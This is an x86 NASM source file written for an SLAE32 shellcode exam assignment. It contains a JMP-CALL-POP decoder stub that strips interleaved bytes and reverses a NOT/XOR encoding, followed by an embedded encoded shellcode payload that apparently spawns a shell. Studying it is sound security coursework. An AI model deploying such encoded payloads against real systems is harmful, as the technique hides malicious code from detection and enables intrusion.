; custom-decoder.nasm
; Author: Jack McBride (PA-6483)
; Website:  https://jacklgmcbride.co.uk
;
; Purpose: SLAE32 exam assignment
;
;
; Assignment 4: Custom Encoder

global _start			

section .text

_start:

	jmp short call_shellcode

decoder:
	pop esi
	lea edi, [esi]
	xor ebx, ebx
	xor eax, eax

decode:
	mov bl, byte[esi + eax]
	mov dl, bl
	xor dl, 0xbb
	jz EncodedShellcode
	test al, 1
	jnz decode_loop_inc
	not bl
	xor bl, 0x7
	mov byte [edi], bl
	inc edi
	inc eax
	jmp short decode

decode_loop_inc:
	add al, 1
	jmp short decode

call_shellcode:

	call decoder
	EncodedShellcode: db 0xc9,0x09,0x38,0x52,0xa8,0x0e,0x90,0x37,0xd7,0x39,0xd7,0x04,0x8b,0x20,0x90,0x27,0x90,0x1e,0xd7,0x2d,0x9a,0x35,0x91,0x51,0x96,0x4f,0x71,0x22,0x1b,0x22,0xa8,0x3c,0x71,0x3c,0x1a,0x0f,0xab,0x35,0x71,0x58,0x19,0x3b,0x48,0x0b,0xf3,0x57,0x35,0x4f,0x78,0xbb

